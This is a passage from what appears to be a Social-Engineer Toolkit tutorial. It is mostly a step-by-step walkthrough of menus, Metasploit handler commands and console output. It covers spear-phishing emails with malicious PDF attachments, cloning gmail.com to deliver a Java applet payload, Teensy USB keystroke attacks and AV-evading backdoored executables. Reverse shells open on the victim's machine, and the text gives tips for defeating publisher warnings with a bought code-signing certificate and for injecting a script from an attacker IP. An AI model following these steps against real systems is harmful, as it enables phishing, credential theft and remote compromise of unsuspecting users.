747 3) Infectious Media Generator
748
749 4) Create a Payload and Listener
750
751 5) Mass Mailer Attack
752
753 6) Arduino-Based Attack Vector
754
755 7) SMS Spoofing Attack Vector
756
757 8) Wireless Access Point Attack Vector
758
759 9) QRCode Generator Attack Vector
760
761 10) Powershell Attack Vectors
762
763 11) Third Party Modules
764
765 99) Return back to the main menu.
766
767 set> 1
768
769Welcome to the SET E-Mail attack method. This module allows you
770
771to specially craft email messages and send them to a large (or small) number of people with attached fileformat malicious payloads. If you want to spoof your email address, be sure “Sendmail” is installed (it is installed in BT4) and change the config/set_config SENDMAIL=OFF flag to SENDMAIL=ON.
772
773There are two options, one is getting your feet wet and letting SET do everything for you (option 1), the second is to create your own FileFormat payload and use it in your own attack. Either way, good luck and enjoy
774
7751. Perform a Mass Email Attack
776
7772. Create a FileFormat Payload
778
7793. Create a Social-Engineering Template
780
7814. Return to Main Menu
782
783Enter your choice:
784
785The spear-phishing attack menu is used for performing targeted email attacks against a victim. You can send multiple emails based on what your harvested or you can send it to individuals. You can also utilize fileformat (for example a PDF bug) and send the malicious attack to the victim in order to hopefully compromise the system.
786
787Select from the menu:
788
789Select from the menu:
790
791 1) Spear-Phishing Attack Vectors
792
793 2) Website Attack Vectors
794
795 3) Infectious Media Generator
796
797 4) Create a Payload and Listener
798
799 5) Mass Mailer Attack
800
801 6) Arduino-Based Attack Vector
802
803 7) SMS Spoofing Attack Vector
804
805 8) Wireless Access Point Attack Vector
806
807 9) QRCode Generator Attack Vector
808
809 10) Powershell Attack Vectors
810
811 11) Third Party Modules
812
813 99) Return back to the main menu.
814
815 set> 2
816
817The Social-Engineer Toolkit “Web Attack” vector is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.
818
819Enter what type of attack you would like to utilize.
820
821The Java Applet attack will spoof a Java Certificate and deliver a Metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
822
823The Metasploit browser exploit method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.
824
825The Credential Harvester Method will utilize web cloning of a website that has a username and password field and harvest all the information posted to the website.
826
827The TabNabbing Method will wait for a user to move to a different tab, then refresh the page to something different.
828
829The Man Left in the Middle Attack Method was introduced by Kos and utilizes HTTP REFERER’s in order to intercept fields and harvest data from them. You need to have an already vulnerable site and incorporate <script src=”http://YOURIP/”>. This could either be from a compromised site or through XSS.
830
831The web jacking attack method was introduced by white_sheep, Emgent and the Back|Track team. This method utilizes iframe replacements to make the highlighted URL link to appear legitimate however when clicked a window pops up then is replaced with the malicious link. You can edit the link replacement settings in the set_config if its to slow/fast.
832
833The multi-attack will add a combination of attacks through the web attack
834
835menu. For example you can utilize the Java Applet, Metasploit Browser,
836
837Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
838
839all at once to see which is successful.
840
841 1) Java Applet Attack Method
842
843 2) Metasploit Browser Exploit Method
844
845 3) Credential Harvester Attack Method
846
847 4) Tabnabbing Attack Method
848
849 5) Man Left in the Middle Attack Method
850
851 6) Web Jacking Attack Method
852
853 7) Multi-Attack Web Method
854
855 8) Victim Web Profiler
856
857 9) Create or import a CodeSigning Certificate
858
859 99) Return to Main Menu
860
861 set:webattack>
862
863The web attack vector is used by performing phishing attacks against the victim in hopes they click the link. There is a wide-variety of attacks that can occur once they click. We will dive into each one of the attacks later on.
864
8653. Infectious Media Generator
866
867The infectious USB/DVD creator will develop a Metasploit based payload for you and craft an autorun.inf file that once burned or placed on a USB will trigger an autorun feature and hopefully compromise the system. This attack vector is relatively simple in nature and relies on deploying the devices to the physical system.
868
8694. Create a Payload and Listener
870
871The create payload and listener is an extremely simple wrapper around Metasploit to create a payload, export the exe for you and generate a listener. You would need to transfer the exe onto the victim machine and execute it in order for it to properly work.
872
8735. Mass Mailer Attack
874
875The mass mailer attack will allow you to send multiple emails to victims and customize the messages. This option does not allow you to create payloads, so it is generally used to perform a mass phishing attack.
876
877Select from the menu:
878
879 1) Spear-Phishing Attack Vectors
880
881 2) Website Attack Vectors
882
883 3) Infectious Media Generator
884
885 4) Create a Payload and Listener
886
887 5) Mass Mailer Attack
888
889 6) Arduino-Based Attack Vector
890
891 7) SMS Spoofing Attack Vector
892
893 8) Wireless Access Point Attack Vector
894
895 9) QRCode Generator Attack Vector
896
897 10) Powershell Attack Vectors
898
899 11) Third Party Modules
900
901 99) Return back to the main menu.
902
903set> 6
904
905The Arduino-Based Attack Vector utilizes the Arduin-based device to
906
907 program the device. You can leverage the Teensy’s, which have onboard
908
909 storage and can allow for remote code execution on the physical
910
911 system. Since the devices are registered as USB Keyboard’s it
912
913 will bypass any autorun disabled or endpoint protection on the
914
915 system.
916
917 You will need to purchase the Teensy USB device, it’s roughly
918
919 $22 dollars. This attack vector will auto generate the code
920
921 needed in order to deploy the payload on the system for you.
922
923 This attack vector will create the .pde files necessary to import
924
925 into Arduino (the IDE used for programming the Teensy). The attack
926
927 vectors range from Powershell based downloaders, wscript attacks,
928
929 and other methods.
930
931 For more information on specifications and good tutorials visit:
932
933 http://www.irongeek.com/i.php?page=security/programmable-hid-usb-keystroke-dongle
934
935 To purchase a Teensy, visit: http://www.pjrc.com/store/teensy.html
936
937 Special thanks to: IronGeek, WinFang, and Garland
938
939 This attack vector also attacks X10 based controllers, be sure to be leveraging
940
941 X10 based communication devices in order for this to work.
942
943 Select a payload to create the pde file to import into Arduino:
944
945 1) Powershell HTTP GET MSF Payload
946
947 2) WSCRIPT HTTP GET MSF Payload
948
949 3) Powershell based Reverse Shell Payload
950
951 4) Internet Explorer/FireFox Beef Jack Payload
952
953 5) Go to malicious java site and accept applet Payload
954
955 6) Gnome wget Download Payload
956
957 7) Binary 2 Teensy Attack (Deploy MSF payloads)
958
959 8) SDCard 2 Teensy Attack (Deploy Any EXE)
960
961 9) SDCard 2 Teensy Attack (Deploy on OSX)
962
963 10) X10 Arduino Sniffer PDE and Libraries
964
965 11) X10 Arduino Jammer PDE and Libraries
966
967 12) Powershell Direct ShellCode Teensy Attack
968
969 99) Return to Main Menu
970
971set:arduino>
972
973The teensy USB HID attack is a method used by purchasing a hardware based device from prjc.com and programming it in a manner that makes the small USB microcontroller to look and feel exactly like a keyboard. The important part with this is it bypasses autorun capabilities and can drop payloads onto the system through the onboard flash memory. The keyboard simulation allows you to type characters in a manner that can utilize downloaders and exploit the system.
974Spear-Phishing Attack Vector
975
976As mentioned previously, the spear phishing attack vector can be used to send targeted emails with malicious attachments. In this example we are going to craft an attack, integrate into GMAIL and send a malicious PDF to the victim. One thing to note is you can create and save your own templates to use for future SE attacks or you can use pre-built ones. When using SET just to note that when hitting enter for defaults, it will always be port 443 as the reverse connection back and a reverse Meterpreter.
977
978Select from the menu:
979
9801. Spear-Phishing Attack Vectors
981
9822. Website Attack Vectors
983
9843. Infectious Media Generator
985
9864. Create a Payload and Listener
987
9885. Mass Mailer Attack
989
9906. Teensy USB HID Attack Vector
991
9927. SMS Spoofing Attack Vector
993
9948. Wireless Access Point Attack Vector
995
9969. Third Party Modules
997
99810. Update the Metasploit Framework
999
100011. Update the Social-Engineer Toolkit
1001
100212. Help, Credits, and About
1003
100413. Exit the Social-Engineer Toolkit
1005
1006Enter your choice: 1
1007
1008Welcome to the SET E-Mail attack method. This module allows you
1009
1010to specially craft email messages and send them to a large (or small)
1011
1012number of people with attached fileformat malicious payloads. If you
1013
1014want to spoof your email address, be sure “Sendmail” is installed (it
1015
1016is installed in BT4) and change the config/set_config SENDMAIL=OFF flag
1017
1018to SENDMAIL=ON.
1019
1020There are two options, one is getting your feet wet and letting SET do
1021
1022everything for you (option 1), the second is to create your own FileFormat
1023
1024payload and use it in your own attack. Either way, good luck and enjoy!
1025
10261. Perform a Mass Email Attack
1027
10282. Create a FileFormat Payload
1029
10303. Create a Social-Engineering Template
1031
10324. Return to Main Menu
1033
1034set:phishing>1
1035
1036Select the file format exploit you want.
1037
1038The default is the PDF embedded EXE.
1039
1040 ********** PAYLOADS **********
1041
1042Select the file format exploit you want.
1043
1044 The default is the PDF embedded EXE.
1045
1046 ********** PAYLOADS **********
1047
1048 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
1049
1050 2) SET Custom Written Document UNC LM SMB Capture Attack
1051
1052 3) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
1053
1054 4) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
1055
1056 5) Adobe Flash Player “Button” Remote Code Execution
1057
1058 6) Adobe CoolType SING Table “uniqueName” Overflow
1059
1060 7) Adobe Flash Player “newfunction” Invalid Pointer Use
1061
1062 8) Adobe Collab.collectEmailInfo Buffer Overflow
1063
1064 9) Adobe Collab.getIcon Buffer Overflow
1065
1066 10) Adobe JBIG2Decode Memory Corruption Exploit
1067
1068 11) Adobe PDF Embedded EXE Social Engineering
1069
1070 12) Adobe util.printf() Buffer Overflow
1071
1072 13) Custom EXE to VBA (sent via RAR) (RAR required)
1073
1074 14) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
1075
1076 15) Adobe PDF Embedded EXE Social Engineering (NOJS)
1077
1078 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
1079
1080 17) Apple QuickTime PICT PnSize Buffer Overflow
1081
1082 18) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
1083
1084 19) Adobe Reader u3D Memory Corruption Vulnerability
1085
1086 20) MSCOMCTL ActiveX Buffer Overflow (ms12-027)
1087
1088 set:payloads> 1
1089
1090What payload do you want to generate:
1091
1092 Name: Description:
1093
1094 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
1095
1096 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
1097
1098 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
1099
1100 4) Windows Bind Shell Execute payload and create an accepting port on remote system
1101
1102 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
1103
1104 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
1105
1106 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
1107
1108 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
1109
1110 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
1111
1112 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
1113
1114 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
1115
1116 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
1117
1118 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
1119
1120 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
1121
1122 15) Import your own executable Specify a path for your own executable
1123
1124set:payloads> 1
1125
1126Below is a list of encodings to try and bypass AV.
1127
1128Select one of the below, ‘backdoored executable’ is typically the best.
1129
1130 1) avoid_utf8_tolower (Normal)
1131
1132 2) shikata_ga_nai (Very Good)
1133
1134 3) alpha_mixed (Normal)
1135
1136 4) alpha_upper (Normal)
1137
1138 5) call4_dword_xor (Normal)
1139
1140 6) countdown (Normal)
1141
1142 7) fnstenv_mov (Normal)
1143
1144 8) jmp_call_additive (Normal)
1145
1146 9) nonalpha (Normal)
1147
1148 10) nonupper (Normal)
1149
1150 11) unicode_mixed (Normal)
1151
1152 12) unicode_upper (Normal)
1153
1154 13) alpha2 (Normal)
1155
1156 14) No Encoding (None)
1157
1158 15) Multi-Encoder (Excellent)
1159
1160 16) Backdoored Executable (BEST)
1161
1162set:encoding> 16
1163
1164set:encoding>16
1165
1166set:payloads> PORT of the listener [443]
1167
1168[*] Windows Meterpreter Reverse TCP selected.
1169
1170Enter the port to connect back on (press enter for default):
1171
1172[*] Defaulting to port 443…
1173
1174[*] Generating fileformat exploit…
1175
1176[*] Please wait while we load the module tree…
1177
1178[*] Started reverse handler on 172.16.32.129:443
1179
1180[*] Creating ‘template.pdf’ file…
1181
1182[*] Generated output file /pentest/exploits/set/src/program_junk/template.pdf
1183
1184[*] Payload creation complete.
1185
1186[*] All payloads get sent to the src/msf_attacks/template.pdf directory
1187
1188[*] Payload generation complete. Press enter to continue.
1189
1190As an added bonus, use the file-format creator in SET to create your attachment.
1191
1192Right now the attachment will be imported with filename of ‘template.whatever’
1193
1194Do you want to rename the file?
1195
1196example Enter the new filename: moo.pdf
1197
11981. Keep the filename, I don’t care.
1199
12002. Rename the file, I want to be cool.
1201
1202Enter your choice (enter for default): 1
1203
1204Keeping the filename and moving on.
1205
1206Social Engineer Toolkit Mass E-Mailer
1207
1208There are two options on the mass e-mailer, the first would
1209
1210be to send an email to one individual person. The second option
1211
1212will allow you to import a list and send it to as many people as
1213
1214you want within that list.
1215
1216What do you want to do:
1217
12181. E-Mail Attack Single Email Address
1219
12202. E-Mail Attack Mass Mailer
1221
12223. Return to main menu.
1223
1224Enter your choice: 1
1225
1226Do you want to use a predefined template or craft a one time email template.
1227
12281. Pre-Defined Template
1229
12302. One-Time Use Email Template
1231
1232Enter your choice: 1
1233
1234Below is a list of available templates:
1235
12361: Baby Pics
1237
12382: Strange Internet usage from your computer
1239
12403: New Update
1241
12424: LOL…have to check this out…
1243
12445: Dan Brown’s Angels & Demons
1245
12466: Computer Issue
1247
12487: Status Report
1249
1250Enter the number you want to use: 7
1251
1252Enter who you want to send email to: davek@fakeaddress.com
1253
1254What option do you want to use?
1255
12561. Use a GMAIL Account for your email attack.
1257
12582. Use your own server or open relay
1259
1260Enter your choice: 1
1261
1262Enter your GMAIL email address: davek@fakeaddress.com
1263
1264Enter your password for gmail (it will not be displayed back to you):
1265
1266SET has finished delivering the emails
1267
1268Do you want to setup a listener yes or no: yes
1269
1270[-] ***
1271
1272[-] * WARNING: No database support: String User Disabled Database Support
1273
1274[-] ***
1275
1276_ _
1277
1278/ \ / \ __ _ __ /_/ __
1279
1280| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
1281
1282| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
1283
1284|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
1285
1286 |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___\
1287
1288 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
1289
1290+ — –=[ 891 exploits – 484 auxiliary – 149 post
1291
1292+ — –=[ 251 payloads – 28 encoders – 8 nops
1293
1294 =[ svn r15540 updated 23 days ago (2012.06.27)
1295
1296resource (src/program_junk/meta_config)> use exploit/multi/handler
1297
1298resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
1299
1300PAYLOAD => windows/meterpreter/reverse_tcp
1301
1302resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
1303
1304LHOST => 172.16.32.129
1305
1306resource (src/program_junk/meta_config)> set LPORT 443
1307
1308LPORT => 443
1309
1310resource (src/program_junk/meta_config)> set ENCODING shikata_ga_nai
1311
1312ENCODING => shikata_ga_nai
1313
1314resource (src/program_junk/meta_config)> set ExitOnSession false
1315
1316ExitOnSession => false
1317
1318resource (src/program_junk/meta_config)> exploit -j
1319
1320[*] Exploit running as background job.
1321
1322msf exploit(handler) >
1323
1324[*] Started reverse handler on 172.16.32.129:443
1325
1326[*] Starting the payload handler…
1327
1328msf exploit(handler) >
1329
1330Once the attack is all setup, the victim opens the email and opens the PDF up:
1331
1332As soon as the victim opens the attachment up, a shell is presented back to us:
1333
1334[*] Sending stage (748544 bytes) to 172.16.32.131
1335
1336[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1139) at Thu Sep 09 09:58:06 -0400 2010
1337
1338msf exploit(handler) > sessions -i 1
1339
1340[*] Starting interaction with 1…
1341
1342meterpreter > shell
1343
1344Process 3940 created.
1345
1346Channel 1 created.
1347
1348Microsoft Windows XP [Version 5.1.2600]
1349
1350(C) Copyright 1985-2001 Microsoft Corp.
1351
1352C:\Documents and Settings\Administrator\Desktop>
1353
1354The spear-phishing attack can send to multiple people or individuals, it integrates into Google mail and can be completely customized based on your needs for the attack vector. Overall this is very effective for email spear-phishing.
1355Java Applet Attack Vector
1356
1357The Java Applet is one of the core attack vectors within SET and the highest success rate for compromise. The Java Applet attack will create a malicious Java Applet that once run will completely compromise the victim. The neat trick with SET is that you can completely clone a website and once the victim has clicked run, it will redirect the victim back to the original site making the attack much more believable. This attack vector affects Windows, Linux, and OSX and can compromise them all. Remember if you want to customize this attack vector, edit the config/set_config in order to change the self-signed information. In this specific attack vector, you can select web templates which are pre-defined websites that have already been harvested, or you can import your own website. In this example we will be using the site cloner which will clone a website for us. Let’s launch SET and prep our attack.
1358
1359Select from the menu:
1360
1361 1) Spear-Phishing Attack Vectors
1362
1363 2) Website Attack Vectors
1364
1365 3) Infectious Media Generator
1366
1367 4) Create a Payload and Listener
1368
1369 5) Mass Mailer Attack
1370
1371 6) Arduino-Based Attack Vector
1372
1373 7) SMS Spoofing Attack Vector
1374
1375 8) Wireless Access Point Attack Vector
1376
1377 9) QRCode Generator Attack Vector
1378
1379 10) Powershell Attack Vectors
1380
1381 11) Third Party Modules
1382
1383 99) Return back to the main menu.
1384
1385set> 2
1386
1387The Web Attack module is a unique way of utilizing multiple web-based attacks
1388
1389 in order to compromise the intended victim.
1390
1391 The Java Applet Attack method will spoof a Java Certificate and deliver a
1392
1393 metasploit based payload. Uses a customized java applet created by Thomas
1394
1395 Werth to deliver the payload.
1396
1397 The Metasploit Browser Exploit method will utilize select Metasploit
1398
1399 browser exploits through an iframe and deliver a Metasploit payload.
1400
1401 The Credential Harvester method will utilize web cloning of a web-
1402
1403 site that has a username and password field and harvest all the
1404
1405 information posted to the website
1406
1407 The TabNabbing method will wait for a user to move to a different
1408
1409 tab, then refresh the page to something different.
1410
1411 The Man Left in the Middle Attack method was introduced by Kos and
1412
1413 utilizes HTTP REFERER’s in order to intercept fields and harvest
1414
1415 data from them. You need to have an already vulnerable site and in-
1416
1417 corporate <script src=”http://YOURIP/”>. This could either be from a
1418
1419 compromised site or through XSS.
1420
1421 The Web-Jacking Attack method was introduced by white_sheep, Emgent
1422
1423 and the Back|Track team. This method utilizes iframe replacements to
1424
1425 make the highlighted URL link to appear legitimate however when clicked
1426
1427 a window pops up then is replaced with the malicious link. You can edit
1428
1429 the link replacement settings in the set_config if its too slow/fast.
1430
1431 The Multi-Attack method will add a combination of attacks through the web attack
1432
1433 menu. For example you can utilize the Java Applet, Metasploit Browser,
1434
1435 Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
1436
1437 all at once to see which is successful.
1438
1439 1) Java Applet Attack Method
1440
1441 2) Metasploit Browser Exploit Method
1442
1443 3) Credential Harvester Attack Method
1444
1445 4) Tabnabbing Attack Method
1446
1447 5) Man Left in the Middle Attack Method
1448
1449 6) Web Jacking Attack Method
1450
1451 7) Multi-Attack Web Method
1452
1453 8) Victim Web Profiler
1454
1455 9) Create or import a CodeSigning Certificate
1456
1457 99) Return to Main Menu
1458
1459set:webattack> 1
1460
1461The first method will allow SET to import a list of pre-defined web
1462
1463 applications that it can utilize within the attack.
1464
1465 The second method will completely clone a website of your choosing
1466
1467 and allow you to utilize the attack vectors within the completely
1468
1469 same web application you were attempting to clone.
1470
1471 The third method allows you to import your own website, note that you
1472
1473 should only have an index.html when using the import website
1474
1475 functionality.
1476
1477 1) Web Templates
1478
1479 2) Site Cloner
1480
1481 3) Custom Import
1482
1483 99) Return to Webattack Menu
1484
1485set:webattack> 2
1486
1487SET supports both HTTP and HTTPS
1488
1489Example: http://www.thisisafakesite.com
1490
1491Enter the url to clone: https://gmail.com
1492
1493*] Cloning the website: https://gmail.com
1494
1495[*] This could take a little bit…
1496
1497[*] Injecting Java Applet attack into the newly cloned website.
1498
1499[*] Filename obfuscation complete. Payload name is: QZ7R7NT
1500
1501[*] Malicious java applet website prepped for deployment
1502
1503What payload do you want to generate:
1504
1505 Name: Description:
1506
1507 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
1508
1509 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
1510
1511 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
1512
1513 4) Windows Bind Shell Execute payload and create an accepting port on remote system
1514
1515 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
1516
1517 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
1518
1519 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
1520
1521 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
1522
1523 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
1524
1525 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and spawn Meterpreter
1526
1527 11) SE Toolkit Interactive Shell Custom interactive reverse toolkit designed for SET
1528
1529 12) SE Toolkit HTTP Reverse Shell Purely native HTTP shell with AES encryption support
1530
1531 13) RATTE HTTP Tunneling Payload Security bypass payload that will tunnel all comms over HTTP
1532
1533 14) ShellCodeExec Alphanum Shellcode This will drop a meterpreter payload through shellcodeexec (A/V Safe)
1534
1535 15) Import your own executable Specify a path for your own executable
1536
1537set:payloads> 2
1538
1539Below is a list of encodings to try and bypass AV.
1540
1541Select one of the below, ‘backdoored executable’ is typically the best.
1542
15431. avoid_utf8_tolower (Normal)
1544
15452. shikata_ga_nai (Very Good)
1546
15473. alpha_mixed (Normal)
1548
15494. alpha_upper (Normal)
1550
15515. call4_dword_xor (Normal)
1552
15536. countdown (Normal)
1554
15557. fnstenv_mov (Normal)
1556
15578. jmp_call_additive (Normal)
1558
15599. nonalpha (Normal)
1560
156110. nonupper (Normal)
1562
156311. unicode_mixed (Normal)
1564
156512. unicode_upper (Normal)
1566
156713. alpha2 (Normal)
1568
156914. No Encoding (None)
1570
157115. Multi-Encoder (Excellent)
1572
157316. Backdoored Executable (BEST)
1574
1575Enter your choice (enter for default): 16
1576
1577[-] Enter the PORT of the listener (enter for default): 443
1578
1579[-] Backdooring a legit executable to bypass Anti-Virus. Wait a few seconds…
1580
1581[-] Backdoor completed successfully. Payload is now hidden within a legit executable.
1582
1583********************************************************
1584
1585Do you want to create a Linux/OSX reverse_tcp payload
1586
1587in the Java Applet attack as well?
1588
1589********************************************************
1590
1591Enter choice yes or no: yes
1592
1593Enter the port to listen for on OSX: 8080
1594
1595Enter the port to listen for on Linux: 8081
1596
1597Created by msfpayload (http://www.metasploit.com).
1598
1599Payload: osx/x86/shell_reverse_tcp
1600
1601 Length: 65
1602
1603Options: LHOST=172.16.32.129,LPORT=8080
1604
1605Created by msfpayload (http://www.metasploit.com).
1606
1607Payload: linux/x86/shell/reverse_tcp
1608
1609 Length: 50
1610
1611Options: LHOST=172.16.32.129,LPORT=8081
1612
1613***************************************************
1614
1615Web Server Launched. Welcome to the SET Web Attack.
1616
1617**************************************************
1618
1619[–] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [–]
1620
1621[*] Launching MSF Listener…
1622
1623[*] This may take a few to load MSF…
1624
1625[-] ***
1626
1627[-] * WARNING: No database support: String User Disabled Database Support
1628
1629[-] ***
1630
1631_ _
1632
1633/ \ / \ __ _ __ /_/ __
1634
1635| |\ / | _____ \ \ ___ _____ | | / \ _ \ \
1636
1637| | \/| | | ___\ |- -| /\ / __\ | -__/ | | | | || | |- -|
1638
1639|_| | | | _|__ | |_ / -\ __\ \ | | | |_ \__/ | | | |_
1640
1641 |/ |____/ \___\/ /\ \___/ \/ \__| |_\ \___
1642
1643 =[ metasploit v4.4.0-dev [core:4.4 api:1.0]
1644
1645+ — –=[ 891 exploits – 484 auxiliary – 149 post
1646
1647+ — –=[ 251 payloads – 28 encoders – 8 nops
1648
1649 =[ svn r15540 updated 23 days ago (2012.06.27)
1650
1651resource (src/program_junk/meta_config)> use exploit/multi/handler
1652
1653resource (src/program_junk/meta_config)> set PAYLOAD windows/meterpreter/reverse_tcp
1654
1655PAYLOAD => windows/meterpreter/reverse_tcp
1656
1657resource (src/program_junk/meta_config)> set LHOST 0.0.0.0
1658
1659LHOST => 0.0.0.0
1660
1661resource (src/program_junk/meta_config)> set LPORT 443
1662
1663LPORT => 443
1664
1665resource (src/program_junk/meta_config)> set ExitOnSession false
1666
1667ExitOnSession => false
1668
1669resource (src/program_junk/meta_config)> exploit -j
1670
1671[*] Exploit running as background job.
1672
1673resource (src/program_junk/meta_config)> use exploit/multi/handler
1674
1675resource (src/program_junk/meta_config)> set PAYLOAD osx/x86/shell_reverse_tcp
1676
1677PAYLOAD => osx/x86/shell_reverse_tcp
1678
1679resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
1680
1681LHOST => 172.16.32.129
1682
1683resource (src/program_junk/meta_config)> set LPORT 8080
1684
1685LPORT => 8080
1686
1687resource (src/program_junk/meta_config)> set ExitOnSession false
1688
1689ExitOnSession => false
1690
1691[*] Started reverse handler on 0.0.0.0:443
1692
1693resource (src/program_junk/meta_config)> exploit -j
1694
1695[*] Starting the payload handler…
1696
1697[*] Exploit running as background job.
1698
1699resource (src/program_junk/meta_config)> use exploit/multi/handler
1700
1701resource (src/program_junk/meta_config)> set PAYLOAD linux/x86/shell/reverse_tcp
1702
1703PAYLOAD => linux/x86/shell/reverse_tcp
1704
1705resource (src/program_junk/meta_config)> set LHOST 172.16.32.129
1706
1707LHOST => 172.16.32.129
1708
1709resource (src/program_junk/meta_config)> set LPORT 8081
1710
1711LPORT => 8081
1712
1713resource (src/program_junk/meta_config)> set ExitOnSession false
1714
1715ExitOnSession => false
1716
1717resource (src/program_junk/meta_config)> set AutoRunScript migrate -f
1718
1719[*] Started reverse handler on 172.16.32.129:8080
1720
1721AutoRunScript => migrate -f
1722
1723resource (src/program_junk/meta_config)> exploit -j
1724
1725[*] Starting the payload handler…
1726
1727[*] Exploit running as background job.
1728
1729msf exploit(handler) >
1730
1731[*] Started reverse handler on 172.16.32.129:8081
1732
1733[*] Starting the payload handler…
1734
1735In this attack, we’ve set up our scenario to clone https://gmail.com and use the reverse meterpreter attack vector on port 443. We’ve used the backdoored executable to hopefully bypass anti-virus and setup Metasploit to handler the reverse connections. If you wanted to utilize an email with this attack vector you could turn the config/set_config turn the WEBATTACK_EMAIL=OFF to WEBATTACK_EMAIL=ON. When you get a victim to click a link or coax him to your website, it will look something like this:
1736
1737As soon as the victim clicks run, you are presented with a meterpreter shell, and the victim is redirected back to the original Google site completely unaware that they have been compromised. Note that Java has updated their applet code to show the “Publisher” field on the applet as UNKNOWN when self signing. In order to bypass this, you will need to register a company in your local state, and buy a code signing certificate in the company name.
1738
1739[*] Sending stage (748544 bytes) to 172.16.32.131
1740
1741[*] Meterpreter session 1 opened (172.16.32.129:443 -> 172.16.32.131:1183) at Thu Sep 09 10:06:57 -0400 2010
1742
1743msf exploit(handler) > sessions -i 1
1744
1745[*] Starting interaction with 1…
1746
1747meterpreter > shell
1748
1749Process 2988 created.
1750
1751Channel 1 created.
1752
1753Microsoft Windows XP [Version 5.1.2600]
1754
1755(C) Copyright 1985-2001 Microsoft Corp.
1756
1757C:\Documents and Settings\Administrator\Desktop>
1758Metasploit Browser Exploit Method
1759
1760The Metasploit Browser Exploit Method will import Metasploit client-side exploits with the ability to clone the website and utilize browser-based exploits. Let’s take a quick look on exploiting a browser exploit through SET.
1761
1762Select from the menu:
1763
1764 1) Spear-Phishing Attack Vectors
1765
1766 2) Website Attack Vectors
1767
1768 3) Infectious Media Generator
1769
1770 4) Create a Payload and Listener
1771
1772 5) Mass Mailer Attack
1773
1774 6) Arduino-Based Attack Vector
1775
1776 7) SMS Spoofing Attack Vector
1777
1778 8) Wireless Access Point Attack Vector
1779
1780 9) QRCode Generator Attack Vector
1781
1782 10) Powershell Attack Vectors
1783
1784 11) Third Party Modules
1785
1786 99) Return back to the main menu
1787
1788set> 2
1789
1790The Web Attack module is a unique way of utilizing multiple web-based attack in order to compromise the intended victim.
1791
1792 The Java Applet Attack method will spoof a Java Certificate and deliver a
1793
1794 metasploit based payload. Uses a customized java applet created by Thomas Werth to deliver the payload.
1795
1796 The Metasploit Browser Exploit method will utilize select Metasploit
1797
1798 browser exploits through an iframe and deliver a Metasploit payload.
1799
1800 The Credential Harvester method will utilize web cloning of a web-
1801
1802 site that has a username and password field and harvest all the
1803
1804 information posted to the website.
1805
1806 The TabNabbing method will wait for a user to move to a different
1807
1808 tab, then refresh the page to something different.
1809
1810 The Man Left in the Middle Attack method was introduced by Kos and
1811
1812 utilizes HTTP REFERER’s in order to intercept fields and harvest
1813
1814 data from them. You need to have an already vulnerable site and in-
1815
1816 corporate <script src=”http://YOURIP/”>. This could either be from a
1817
1818 compromised site or through XSS.
1819
1820 The Web-Jacking Attack method was introduced by white_sheep, Emgent
1821
1822 and the Back|Track team. This method utilizes iframe replacements to
1823
1824 make the highlighted URL link to appear legitimate however when clicked
1825
1826 a window pops up then is replaced with the malicious link. You can edit
1827
1828 the link replacement settings in the set_config if its too slow/fast.
1829
1830 The Multi-Attack method will add a combination of attacks through the web attack menu. For example you can utilize the Java Applet, Metasploit Browser, Credential Harvester/Tabnabbing, and the Man Left in the Middle attack all at once to see which is successful.
1831
1832 1) Java Applet Attack Method
1833
1834 2) Metasploit Browser Exploit Method
1835
1836 3) Credential Harvester Attack Method
1837
1838 4) Tabnabbing Attack Method
1839
1840 5) Man Left in the Middle Attack Method
1841
1842 6) Web Jacking Attack Method
1843
1844 7) Multi-Attack Web Method
1845
1846 8) Victim Web Profiler
1847
1848 9) Create or import a CodeSigning Certificate
1849
1850 99) Return to Main Menu
1851
1852set:webattack> 2
1853
